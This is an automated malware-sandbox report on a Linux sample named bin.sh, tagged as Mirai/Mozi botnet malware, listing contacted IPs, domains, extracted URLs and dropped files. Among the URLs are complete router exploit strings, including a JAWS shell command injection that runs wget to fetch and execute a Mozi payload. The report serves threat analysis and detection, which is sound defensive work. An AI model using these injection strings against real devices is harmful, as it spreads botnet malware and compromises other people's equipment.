We are hiring! Windows Kernel Developer (Remote), apply here!
flash

bin.sh

Status: finished
Submission Time: 2021-01-26 00:23:34 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    344095
  • API (Web) ID:
    590088
  • Analysis Started:
    2021-01-26 00:23:34 +01:00
  • Analysis Finished:
    2021-01-26 00:34:15 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
40/62

malicious
19/36

malicious
19/28

malicious

IPs

IP Country Detection
111.185.181.169
Taiwan; Republic of China (ROC)
97.75.153.94
United States
183.168.111.212
China
Click to see the 97 hidden entries
74.224.191.111
United States
58.98.0.84
Japan
26.20.176.82
United States
29.54.98.88
United States
190.216.209.174
Argentina
78.239.138.225
France
172.138.55.56
United States
18.83.153.48
United States
37.26.220.89
Norway
206.116.81.106
Canada
194.189.0.209
United Kingdom
151.44.94.207
Italy
157.52.50.34
United States
157.116.228.108
Japan
86.100.251.184
Lithuania
153.158.34.130
Japan
157.194.246.3
United States
37.145.1.63
Russian Federation
174.248.113.180
United States
91.68.153.140
France
103.4.42.175
Japan
66.131.172.140
Canada
165.69.88.89
Australia
44.134.174.174
United States
96.227.126.40
United States
87.197.254.225
Slovakia (SLOVAK Republic)
217.142.216.81
Sweden
182.23.203.242
China
5.14.105.137
Romania
125.134.6.76
Korea Republic of
98.101.97.159
United States
215.93.198.247
United States
207.6.190.120
Canada
202.144.169.171
Australia
45.148.96.51
Netherlands
104.208.243.62
United States
106.187.85.86
Japan
110.72.210.139
China
163.212.48.150
Japan
59.18.131.116
Korea Republic of
160.118.8.178
South Africa
133.4.40.28
Japan
222.240.82.124
China
192.19.254.53
United States
18.210.13.68
United States
111.224.91.153
China
24.78.103.243
Canada
57.99.238.88
Belgium
61.77.98.141
Korea Republic of
114.3.158.246
Indonesia
58.222.87.135
China
192.79.67.208
United States
4.0.19.168
United States
170.79.55.160
Brazil
99.147.205.5
United States
221.65.136.75
Japan
201.233.149.101
Colombia
171.131.146.1
United States
176.248.82.68
United Kingdom
135.53.228.40
United States
223.155.36.174
China
33.216.73.164
United States
170.109.123.136
United States
154.45.216.205
United States
147.200.251.34
Australia
159.204.183.75
United States
201.8.221.107
Brazil
88.1.239.79
Spain
91.76.37.43
Russian Federation
160.157.215.58
Tunisia
167.151.41.249
United States
169.109.182.90
United States
170.108.229.35
United States
119.18.79.138
Korea Republic of
169.173.126.123
United States
105.25.217.164
Mauritius
105.196.8.55
Egypt
81.54.152.81
France
3.110.190.131
United States
137.32.169.4
United States
197.204.152.220
Algeria
117.60.217.40
China
6.202.86.157
United States
112.197.177.142
Viet Nam
136.17.125.150
United States
134.247.139.110
Germany
112.234.3.209
China
207.168.147.166
United States
40.77.4.165
United States
148.144.86.87
United States
187.178.106.53
Mexico
214.128.251.204
United States
93.220.218.152
Germany
172.95.177.246
United States
58.77.57.138
Korea Republic of
5.139.220.125
Russian Federation
84.37.51.95
France

Domains

Name IP Detection
dht.transmissionbt.com
87.98.162.88
bttracker.acc.umu.se
130.239.18.159
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://190.166.164.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://52.64.147.225:80/HNAP1/
http://173.223.142.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 40 hidden entries
http://176.122.182.151:80/HNAP1/
http://%s:%d/bin.sh
http://172.252.124.171:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://85.153.79.234:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://85.95.252.164:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.17.98.63:80/HNAP1/
http://104.73.19.166:80/HNAP1/
http://184.27.52.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://52.201.62.234:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://68.233.196.110:80/HNAP1/
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://222.236.20.88:49152/soap.cgi?service=WANIPConn1
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/Mozi.m;
http://www.alsa-project.org.
http://HTTP/1.1
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://schemas.xmlsoap.org/soap/envelope//
http://www.alsa-project.org
http://pastebin.ca)
http://%s:%d/Mozi.a;chmod
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://ipinfo.io/ip
http://www.pastebin.ca/upload.php
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1sendcmd
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://13.235.141.230:37215/ctrlt/DeviceUpgrade_1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#